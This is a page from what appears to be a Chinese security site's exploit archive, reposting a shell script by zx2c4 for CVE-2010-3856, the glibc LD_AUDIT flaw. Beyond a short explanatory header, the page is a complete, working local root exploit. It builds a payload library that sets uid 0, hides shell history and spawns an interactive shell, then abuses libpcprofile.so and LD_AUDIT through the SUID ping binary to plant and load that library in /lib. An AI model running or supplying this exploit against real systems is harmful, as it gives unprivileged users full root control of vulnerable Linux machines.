首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
glibc LD_AUDIT arbitrary DSO load Privilege Escalation
来源:http://seclists.org 作者:zx2c4 发布时间:2011-11-11  

#!/bin/sh

            #######################################################
            #       I Can't Read and I Won't Race You Either      #
            #                      by zx2c4                       #
            #######################################################

################################################################################
# This is an exploit for CVE-2010-3856.
#
# A while back, Tavis showed us three ways to exploit flaws in glibc's dynamic
# linker involving LD_AUDIT. [1] [2]
#
# The first way involved opening a file descriptor and using fexecve to easily
# win a race with $ORIGIN. The problem was that this required having read
# permissions on the SUID executables. Tavis recommended a work around involving
# filling a pipe until it was full so that anything written to stderr would
# block. This race, however, was not always successful. The third thing he
# showed us was that LD_AUDIT would load any trusted library, and he pointed out
# that libpcprofile.so could be jiggered to create a world writable root owned
# file in any directory. One candidate would be to write something to a crontab.
# What if, however, you don't have cron installed? He then went on to explain a
# quite extensive search routine to find candidates for libraries to load.
#
# But why search, when you already can make a world writable root owned file in
# any directory you want? The easier way is to use libpcprofile.so to create
# such a file, and then fill that file with code you want to run. Then, run that
# code using the same trick. Pretty simple, and it works.
#
# - zx2c4
# 2011-11-9
#
# greets to taviso.
#
# [1] http://seclists.org/fulldisclosure/2010/Oct/257
# [2] http://seclists.org/bugtraq/2010/Oct/200
################################################################################

echo "[+] Setting umask to 0 so we have world writable files."
umask 0

echo "[+] Preparing binary payload."
cat > /tmp/payload.c <<_EOF
void __attribute__((constructor)) init()
{
 printf("[+] Cleaning up.\n");
 unlink("/lib/libexploit.so");

 printf("[+] Launching shell.\n");
 setuid(0);
 setgid(0);
 setenv("HISTFILE", "/dev/null", 1);
 execl("/bin/sh", "/bin/sh", "-i", 0);
}
_EOF
gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c

echo "[+] Writing root owned world readable file in /lib"
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libexploit.so" ping 2>/dev/null

echo "[+] Filling the lib file with lib contents."
cat /tmp/exploit > /lib/libexploit.so
rm /tmp/payload.c /tmp/exploit

echo "[+] Executing payload."
LD_AUDIT="libexploit.so" ping
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AbsoluteFTP 1.9.6 - 2.2.10 Rem
·Soda PDF Professional 1.2.155
·AbsoluteFTP 1.9.6 - 2.2.10 Rem
·Aviosoft Digital TV Player Pro
·MS11-083 Denial Of Service
·Comtrend Router CT-5624 Remote
·Kool Media Converter v2.6.0 DO
·Oracle XDB.XDB_PITRIG_PKG.PITR
·Support Incident Tracker <= 3.
·Oracle Hyperion Strategic Fina
·Aviosoft Digital TV Player Pro
·Linux Kernel 2.6.11 Local root
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved